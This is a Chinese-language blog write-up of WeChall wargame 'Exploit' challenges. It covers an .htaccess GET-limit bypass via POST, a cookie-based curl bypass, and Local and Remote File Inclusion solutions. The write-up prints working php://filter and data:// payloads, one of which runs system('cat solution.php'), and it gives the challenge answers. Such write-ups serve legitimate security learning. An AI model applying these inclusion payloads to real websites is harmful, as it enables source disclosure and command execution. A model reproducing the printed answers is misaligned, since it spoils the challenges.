WeChall Exploit writeup

WeChall Exploit writeup

有一些题目在PHP、MYSQL里面就已经做过了,所以这里题解就不再写了,想看的可以去看看我写的Mysql和PHP的Writeup。

Wechall Exploit系列题目链接:http://www.wechall.net/challs/Exploit

Limited Access

刚刚学完.htaccess的各种知识就遇到这样的题了,真是不能更赞。
这里直接进Mypage,会出现这样子的错误

这里写图片描述

这时候看看它的.htaccess文件,如下:

AuthUserFile .htpasswd
AuthGroupFile /dev/null
AuthName "Authorization Required for the Limited Access Challenge"
AuthType Basic
<Limit GET>
require valid-user
</Limit>

看到了很关键的东西就是他限制了GET,然后又看到第一个是AuthUserFile .htpasswd那就试试POST,把这个.htpasswd传过去看看。然后就成功了。。。
当然还有一些别的思路

<form method="POST" action="https://www.wechall.net/challenge/wannabe7331/limited_access/protected/protected.php">
<input type="submit" value="submit">
</form>

Limited Access Too

这里比较蛋疼,查了资料发现很多都说是用curl命令带上cookie就能够成功绕过,我试了试,果然可以

curl -c "WC=8905651-18041-Z8otHq2wU99l96gV" -c 自己的cookie http://www.wechall.net/challenge/wannabe7331/limited_access_too/protected/protected.php

然后没太想明白为什么,于是我用python的requests又试了一下,如下:

url="http://www.wechall.net/challenge/wannabe7331/limited_access_too/protected/protected.php"
params={'Cookie':自己的cookie}
r=requests.get(url,headers=params).content
print r

发现还是可以的,原理我也不是太清楚,猜测是只要不是直接通过浏览器发送请求应该都可以。

Warchall: Live LFI

点进链接之后,如下

这里写图片描述

右上角两个EN DE是可以点击的,一点,我们需要的get参数就出来了。
参数就是lang,经过简单几次尝试之后,如下:

http://lfi.warchall.net/index.php?lang=solution.php

上述链接产生了这样子的结果,

这里写图片描述

那么,我们就可以试着看看这个solution.php的源码,

http://lfi.warchall.net/?lang=php://filter/read=convert.base64-encode/resource=solution.php

Base64解密之后得到源码如下:

<html>
<body>
<pre style="color:#000;">teh falg si naer!</pre>
<pre style="color:#fff;">the flag is near!</pre>
</body>
</html>
<?php                  #   YOUR_TROPHY 
return 'SteppinStones42Pie'; # <-´ 
?>

所以答案就出来了,是SteppinStones42Pie

Warchall: Live RFI

和上一道差不太多,这里我最开始使用的是

http://rfi.warchall.net/index.php?lang=data://text/plain,<?php  print file_get_contents("solution.php")  ?>

然后得到答案:

.....
.....
<?php return 'Low_H4NGING_Fruit'; ?>
.....
.....

注意这里千万不要被蒙蔽了,

这里写图片描述

这里虽然只看见这个东西,但是他的答案在后面,看网页源码就知道了,中间它给了很多很多空格来混淆视听。
但是这里其实直接用之前那个题的payload也可以的

http://lfi.warchall.net/?lang=php://filter/read=convert.base64-encode/resource=solution.php

还有一些别的思路

http://rfi.warchall.net/index.php?lang=data://text/plain,<?php  system("cat solution.php")  ?>
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值